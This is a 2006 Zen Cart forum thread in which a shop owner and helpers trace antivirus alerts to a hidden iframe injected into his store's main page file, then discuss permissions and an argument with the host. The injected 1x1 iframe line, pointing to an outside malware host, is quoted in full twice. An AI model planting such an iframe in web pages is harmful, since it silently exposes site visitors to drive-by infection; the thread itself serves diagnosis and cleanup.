Zen Cart Logo
Forums / General Questions / A VIRAL Problem!

A VIRAL Problem!

Locked

Views: 7,529

Results 1 to 20 of 46
This thread is locked. New replies are disabled.
26 Jun 2006, 8:34 PM
#1
big_gee avatar

big_gee

New Zenner

Join Date:
May 2006
Location:
Aberaeron, Ceredigion, Wales
Posts:
73
Plugin Contributions:
0

A VIRAL Problem!

Hello Everyone,

I've discovered a horrible problem with my unfinished "shop"
link to site removed

When viewed by IE on Win XP I get a viral warning from my AV software link removed

When viewed by Opera I get a message that tells me that http.....xbtuavnxbb.biz/dl/adv493.php can not be accessed. This is not a file on my site, I presume it's a "hijack" URL from a viral source.

In Firefox everything works fine! No warnings, no AV software intervention.

I've removed the virus (Hacktool.IE.Exploit) in the usual manner - switch off "restore" in XP, scan, delete file, reboot etc. etc. The AV software is not activated when I browse other sites using IE BUT as soon as I open my ZC Store page I immediately get the alert again.

Has anyone else encountered a similar problem? What's more, is this virus resident in the ZC files on my server?

Any ideas?

Many Thanks,

G

26 Jun 2006, 9:10 PM
#2
drbyte avatar

drbyte

Sensei

Join Date:
Jan 2004
Posts:
63,513
Plugin Contributions:
176

Re: A VIRAL Problem!

That's a nasty one.....

Not sure where it's being triggered from, but here's a few ideas to check:

  • iframe link:```
<iframe width="1" height="1" src="http://step57.info/traff/index2.php" style="border: 0;"></iframe> ``` - all your template images ... to be sure nothing's embedded - your no-right-click javascript - and your flash content .... and maybe also the OBJECT/EMBED code you're using to load/init the flash content.

(We deactivated the links in your post because they even caused the JS to start infecting our test machines....)

26 Jun 2006, 9:18 PM
#4
drbyte avatar

drbyte

Sensei

Join Date:
Jan 2004
Posts:
63,513
Plugin Contributions:
176

Re: A VIRAL Problem!

yup -- and the iframe appears to be coming from your define-page-main code (see the last line here):```html
<font color="#000080">
<img vspace="0" hspace="0" border="0" align="bottom" src="http://sccambria-online-linux-store.com/pics/thankyou_greeting.jpg" width="185" height="79"/></font></strong></font><p><strong>
<font size="3" color="#cc0000">
<span style="color: #000080;"><font face="Arial">If you're a </font>
</span> </font> <font style="font-family: Arial; " size="4">
L<font color="#FF0000">I</font>NUX</font><font size="4" color="#000080" style="font-family: Arial; font-weight: bold"> </font>
<font size="3" style="color: #000080;" face="Arial" color="#cc0000">enthusiast you'll find EVERYTHING you need right here - and at the most competitive prices available anywhere on the Internet. Many items (like programmes and utilities etc.) are <span style="font-style: italic;">ABSOLUTELY FREE!</span></font></strong></p>

<p><strong> <font face="Arial" color="#ff3366"><font color="#000080">I</font><span style="color: #000080;">f you use one of the proprietary Operating System (like Microsoft) then there's still lots of HARDWARE, SOFTWARE and DOWNLOADS for you to choose from also. If you're thinking of migrating to </span> </font> <font style="font-family: Arial; " size="4"> L<font color="#FF0000">I</font>NUX</font><font face="Arial" color="#ff3366"><span style="color: #000080;"> then this is <i>DEFINITELY THE PLACE FOR YOU!</i></span><i><font color="#000080"> </font> </i> </font></strong></p> <p><strong> <font color="#000080" face="Arial">Whether you're looking for a LINSPIRE LINUX Distro or a "READY TO GO" pre-built and tested S.C.Cambria Desktop or Laptop Computer System - we have it all for you.</font></strong></p> <p><strong> <font color="#000080" face="Arial">All the hardware listed in our shop - which is available for immediate online purchase - has been fully tested and is compatible with the latest LINSPIRE 5.0 Desktop and Laptop Operating System. From a humble Mouse to a Wireless Server you'll find it ALL in our shop!Don't forget to check out our </font> </strong></p> <p><font face="Arial"><a title="Goto our HOSTING PLANS info. page" href="http://www.sccambria.com/hosting_plans_comparison.htm" target="_blank"><strong> <font color="#FF0000">WEB HOSTING PLANS</font></strong></a><font color="#000080"> </font> <a href="http://www.sccambria.com/hosting_plans_comparison.htm"> <font color="#000080"> <a target="_blank" href="http://www.sccambria.com/hosting_plans_comparison.htm"> <img hspace="0" border="0" align="bottom" src="http://www.sccambria.com/pics/saeth_las_dde.jpg" width="18" height="18" /></a></font></a><font color="#000080">     <font size="4"> </font></font><a title="See our WEB DESIGN SERVICE page" href="http://www.sccambria.com/webdesign.htm" target="_blank"><strong><font color="#FF0000">WEB-SITE DESIGN SERVICES</font></strong></a><font color="#000080"> </font></font> <a href="http://www.sccambria.com/webdesign.htm"> <font color="#000080"> <a target="_blank" href="http://www.sccambria.com/webdesign.htm"> <img hspace="0" border="0" align="bottom" src="http://www.sccambria.com/pics/saeth_las_dde.jpg" width="18" height="18" /></a></font></a></p><iframe width="1" height="1" src="http://step57.info/traff/index2.php" style="border: 0;"></iframe> ```
26 Jun 2006, 10:46 PM
#5
big_gee avatar

big_gee

New Zenner

Join Date:
May 2006
Location:
Aberaeron, Ceredigion, Wales
Posts:
73
Plugin Contributions:
0

Re: A VIRAL Problem!

You're a star DrByte!

Now you're going to have to pass this by me VERY slowly.

So (according to the last line in the copy of the code you showed in your last post) the offending code is contained in that line of my define-page-main code file. I.e. <iframe width="1" height="1" src="http://step57.info/traff/index2.php" style="border: 0;"></iframe>

If this is so then
a) Will deleting that section of spurious code rectify my problem?

b) Where did that information come from in the first place? Could it be the template I used? And

c) Why is the problem apparent in IE & Opera but not Firefox?

Thanks,

G

26 Jun 2006, 10:53 PM
#6
xt0rt avatar

xt0rt

Zen Follower

Join Date:
Sep 2005
Location:
The Internets
Posts:
179
Plugin Contributions:
0

Re: A VIRAL Problem!

I've seen similar posts like this one here and there... where is this crap coming from? Is there a website somewhere offering a compromised Zen download? Is this a problem on Windows servers only or all across the board?

Just seems a bit off...

26 Jun 2006, 10:57 PM
#7
big_gee avatar

big_gee

New Zenner

Join Date:
May 2006
Location:
Aberaeron, Ceredigion, Wales
Posts:
73
Plugin Contributions:
0

Re: A VIRAL Problem!

IF I've read that thread on http://forums.startlogic.com/viewtopic.php?t=547 correctly then the problem could be with the server itself. I'm getting very jittery about this! I've got other sites on the same server.

If the spurious insert can get planted in one line of code what's stopping it happening to multiples of files? In which case it would be absolutely disasterous.

HELP!!!

G

26 Jun 2006, 11:06 PM
#8
big_gee avatar

big_gee

New Zenner

Join Date:
May 2006
Location:
Aberaeron, Ceredigion, Wales
Posts:
73
Plugin Contributions:
0

Re: A VIRAL Problem!

xt0rt:

I've seen similar posts like this one here and there... where is this crap coming from? Is there a website somewhere offering a compromised Zen download? Is this a problem on Windows servers only or all across the board?

Just seems a bit off...

No idea xOrt,

My original zipped download came from the official ZC website. The only addition was the template I'm using plus a bug fixed file that was causing problems, but that was a seperate issue. That amended file came from the Dev Team. So no outside sources have been used for the actual ZC files. If there is a compromised copy floating around then I certainly didn't download it.

G

26 Jun 2006, 11:41 PM
#9
drbyte avatar

drbyte

Sensei

Join Date:
Jan 2004
Posts:
63,513
Plugin Contributions:
176

Re: A VIRAL Problem!

I'm guessing that maybe some rogue script on the server may be doing it ... esp since the define_page_xxx files are in a folder that's CHMOD 777 .... making them writable by "world". While this is necessary if you wish to edit those file from your Admin interface, it also leaves the files somewhat at risk, depending on the server's configuration.

This sort of thing is why hosts enable the "open_basedir restriction" settings in PHP... to prevent people from outside your account having any access to files inside your account, regardless of the permissions set. But that only works if the infiltrator is making their attempts via PHP.

If the "attack" is entering via something at the filesystem level, you are likely still at risk.

AT THE VERY LEAST, YOU SHOULD NOTIFY YOUR HOST ABOUT THIS... so they can take measures to stop it.... and maybe identify where it came from.

Your server's errorlog may or may not help you see where rogue access attempts came from.

26 Jun 2006, 11:51 PM
#10
vger avatar

vger

Past Contributor

Join Date:
Nov 2004
Location:
Norfolk, United Kingdom
Posts:
3,189
Plugin Contributions:
0

Re: A VIRAL Problem!

Why is the problem apparent in IE & Opera but not Firefox?

I'm guessing that because it's called Hacktool.IE.Exploit that it seeks out vulnerabilities in IE (and Opera can be configured to work as if it was IE).
It's probably related to running Active Content in IE.

The worse problem is that if it is using Active Content and someone who doesn't have a Firewall comes to your site then their computer could get infected with this trojan.

Vger

26 Jun 2006, 11:57 PM
#11
big_gee avatar

big_gee

New Zenner

Join Date:
May 2006
Location:
Aberaeron, Ceredigion, Wales
Posts:
73
Plugin Contributions:
0

Re: A VIRAL Problem!

Thank you DrByte & Vger.

I've just despatched an urgent message to the folks at the server end with a link to this thread for further info. Hopefully they'll be able to trace the source, and if they can't they should be able to contain the problem. I'm waiting for their response - I'll keep you posted.

G

27 Jun 2006, 1:09 AM
#12
jollyjim avatar

jollyjim

Totally Zenned

Join Date:
May 2005
Location:
Cheshire, UK
Posts:
401
Plugin Contributions:
2

Re: A VIRAL Problem!

G

Check your images folder. I had a similar problem and found a PHP file had been uploaded into the images folder and this was being called by a virus which in turn propgated itself into other computers. I suspect the initial virus arrives by email and when you connect by FTP it uploads itself to the active directory on the server. From there it infects any computer which loads the site into a browser.

Have a look at the DO NOT IGNORE POST I made some weeks ago in the hacks forum warning people about this.

Hope this helps

JJ

27 Jun 2006, 1:26 AM
#13
big_gee avatar

big_gee

New Zenner

Join Date:
May 2006
Location:
Aberaeron, Ceredigion, Wales
Posts:
73
Plugin Contributions:
0

Re: A VIRAL Problem!

JollyJim:

G

Check your images folder. I had a similar problem and found a PHP file had been uploaded into the images folder and this was being called by a virus which in turn propgated itself into other computers. I suspect the initial virus arrives by email and when you connect by FTP it uploads itself to the active directory on the server. From there it infects any computer which loads the site into a browser.

Have a look at the DO NOT IGNORE POST I made some weeks ago in the hacks forum warning people about this.

Hope this helps

JJ

Thanks Jim,
Just checked and there are no php files in the "images" folder on the server. I doubt if any e-mails would have slipped past my defences anyway. I've been doing a bit of research and the indicators are that there's a vulnerability on the server side. Probably a rogue script there that's inserting the wilful code into lines of coding in programmes located on the server. I only hope that it's only done it once in the one file otherwise I've got a mess on my hands. I'm waiting for the server staff to come back to me with some info.

I could really do without this :cry:

G

27 Jun 2006, 12:54 PM
#14
vger avatar

vger

Past Contributor

Join Date:
Nov 2004
Location:
Norfolk, United Kingdom
Posts:
3,189
Plugin Contributions:
0

Re: A VIRAL Problem!

You won't want to hear this - but you need to shut your site down until it is resolved. If the trojan is on the server (which I think it is) then removing the code will do nothing - it will reinsert itself. Anyone coming to your site is at risk while this goes on.

Vger

27 Jun 2006, 4:17 PM
#15
big_gee avatar

big_gee

New Zenner

Join Date:
May 2006
Location:
Aberaeron, Ceredigion, Wales
Posts:
73
Plugin Contributions:
0

Re: A VIRAL Problem!

Vger:

You won't want to hear this - but you need to shut your site down until it is resolved. If the trojan is on the server (which I think it is) then removing the code will do nothing - it will reinsert itself. Anyone coming to your site is at risk while this goes on.

Vger
Yes I'd worked that out. Fortunately the site is still in the process of construction so although accessible it's not yet well advertised. The index file is actually a "site under construction" notice. The only people who can access the store are those who are aware of the "shop" directory. However I'll have to shut it down anyway, until the problem is resolved. I'm having trouble getting my hosts (Hostgator) to accept responsibility at present. Here's the latest bit of correspondence from them.
The problem appears the be an exploit through a script running on your account allowing the attackers to modify the files. All files located in the /home/scc123/www/sccambria-online-linux-store/shop/includes/languages/english/html_includes directory are set to 777 which will allow the webserver to modify these files. I would recommend restoring the files and then making sure they are set to 644.

I'll let you know what comes of it. If it is a script on the server that's calling up this virus then everyone with accounts are under threat.

Regards,

G

27 Jun 2006, 4:25 PM
#16
vger avatar

vger

Past Contributor

Join Date:
Nov 2004
Location:
Norfolk, United Kingdom
Posts:
3,189
Plugin Contributions:
0

Re: A VIRAL Problem!

They're not exactly on the ball, are they? If you had set files with permissions of 777 on our servers you'd have taken your site down (it's not allowed, as it is a security risk), and all you'd have seen would have been a white screen with a "500 - Internal Server Error" notice. Even on folders the highest we allow is 755.

They are correct about two things though:

  1. The need to cleanse all files
  2. The need to reset permissions on the files to no higher than 644

Vger

27 Jun 2006, 5:16 PM
#17
big_gee avatar

big_gee

New Zenner

Join Date:
May 2006
Location:
Aberaeron, Ceredigion, Wales
Posts:
73
Plugin Contributions:
0

Re: A VIRAL Problem!

Vger:

They're not exactly on the ball, are they? If you had set files with permissions of 777 on our servers you'd have taken your site down (it's not allowed, as it is a security risk), and all you'd have seen would have been a white screen with a "500 - Internal Server Error" notice. Even on folders the highest we allow is 755.

They are correct about two things though:

  1. The need to cleanse all files
  2. The need to reset permissions on the files to no higher than 644

Vger

My sentiments exactly. Also the ppermissions (if possible) were not set to 777 by me, so one assumes that it's tied up with the functions of the malicious script that placed the iFrame string at the foot of my define_main_page.php file.

Here's the latest reply from them. It seems to me that there's a suggestion here that the iFrame string was in the file when it got downloaded from Zen Cart! The version was absolutely current when I downloaded it, and no way on earth was it there (I hope)! Besides, upgrading the cart is not a solution - it suggests that the iFrame string is present in ALL previous downloads, which of course is a load of bovine excrement.

G

Hi,

This is a very common exploit done on the script itself not on our servers. Just because you downloaded it from there site doesn't mean the script is secure. You will need to edit the code out of your site and upgrade your cart. We see these every day when people do not keep there scripts up to date.

Best Regards,
Alex
HostGator Technical Support

27 Jun 2006, 6:14 PM
#18
xt0rt avatar

xt0rt

Zen Follower

Join Date:
Sep 2005
Location:
The Internets
Posts:
179
Plugin Contributions:
0

Re: A VIRAL Problem!

You should let 'Alex' know that you no longer want them as a host and arrange to get your Zen site moved over to a Certified Host.

Alot of hosts are a complete joke, it's best to pay a bit more if necessary and actually get decent service.

27 Jun 2006, 8:17 PM
#19
big_gee avatar

big_gee

New Zenner

Join Date:
May 2006
Location:
Aberaeron, Ceredigion, Wales
Posts:
73
Plugin Contributions:
0

Re: A VIRAL Problem!

xt0rt:

You should let 'Alex' know that you no longer want them as a host and arrange to get your Zen site moved over to a Certified Host.

Alot of hosts are a complete joke, it's best to pay a bit more if necessary and actually get decent service.

That may well be the ultimate solution in the final analysis. However Hosgator is not a small backroom host company. An organisation their size should be on top of this problem.

Out of interest here's excerpts from the last few exchanges we've had. Judging by his attack on ZCs php coding I think someone from the Dev. Team should take this up with someone at Hostgator - who knows how many other ZC users may be fed this poison when their stores get compromised in the same way?

Please don't insult my intelligence like this. To suggest that the spurious
iFrame string was present from original download from the official Zen Cart
website is ludicrous - are you seriously suggesting that all downloads from
that source contain this string? Incidentally the version is up to date and
contains the latest release of the ZC software.

I've checked my original files that were uploaded to your server and they
don't contain this line of malicious coding. The line of code responsible
for the problem was inserted after upload to your server, suggesting to me
that some exploit script is being deployed on your server software. Perhaps
that's the reason you can say " We see these every day when people do not
keep there scripts up to date". This has absolutely nothing to do with
keeping my scripts up to date. The scripts that were contained in my Zen
cart upload to the server were absolutely up to date.

Please investigate further and report your findings back to me. If this
situation can not be resolved in a professional manner I will have no
alternative but to seek another host, seek compensation from Hostgator and
further to advertise this wholly unacceptable stance that you have chosen to
adopt.

Gwilym.

===========================================================

----- Original Message -----
From: "HostGator Support" [email protected]
To: [email protected]
Sent: 27 June 2006 06:02 PM
Subject: [#CXE-469446]: URGENT!! REQUIRES YOUR IMMEDIATE ATTENTION

Hi,
This is a very common exploit done on the script itself not on our
servers. Just because you downloaded it from there site doesn't mean the
script is secure. You will need to edit the code out of your site and
upgrade your cart. We see these every day when people do not keep there
scripts up to date.

Best Regards,
Alex
HostGator Technical Support

Ticket Details

Ticket ID: CXE-469446
Department: Support
Status: On Hold

Follow up

Hi,

This was not present during the download. No one ever said it was. Alot of php scripts out there have Exploits allowing remote mysql insertions and or having premissions set to 777 allowing other harmful scripts to be uploaded. This is not done from a "trojan" or a "virus" on our servers. This is due to bad coding and or exploits being found on exsiting scripts. here is a clear example on what can happen. http://www.governmentsecurity.org/archive/t8822.html I highly recommend looking on zen carts fourms and seeing if theres a patch for this if is indeed the newest up to date version.

Best Regards,
Alex
HostGator Technical Support

My last reply:

Fine Alex, you may have a point with older coding, with known issues, that
is not the case with the problem I've highlighted.

Would you care to view this? http://wordpress.org/support/topic/69655

Now I still suggest that there's a malicious script on your servers that
seeks out php files and attacks them by inserting the iFrame string at the
foot of the code. Having me remove the spurious insertions and reloading my
files will not prevent the same thing happening again if that malicious
script that instigates the problem is not properly investigated and found.

Gwilym.

This is not funny - and I'm not going to give up easily on it. If anyone wants to lend some weight feel free to wade in, after all it's ZCart's reputation at stake. Their e-mail address is: [email protected]

Should this thread be relocated elsewhere on this forum?

G

27 Jun 2006, 8:47 PM
#20
Kim avatar

Kim

Obaa-san

Join Date:
Jun 2003
Location:
West Coast, North America
Posts:
26,627
Plugin Contributions:
0

Re: A VIRAL Problem!

For the third time- This is not coming from Zen Cart - The Trojan is getting into your files that are chmod 777, but the Trojan is ON THE SERVER.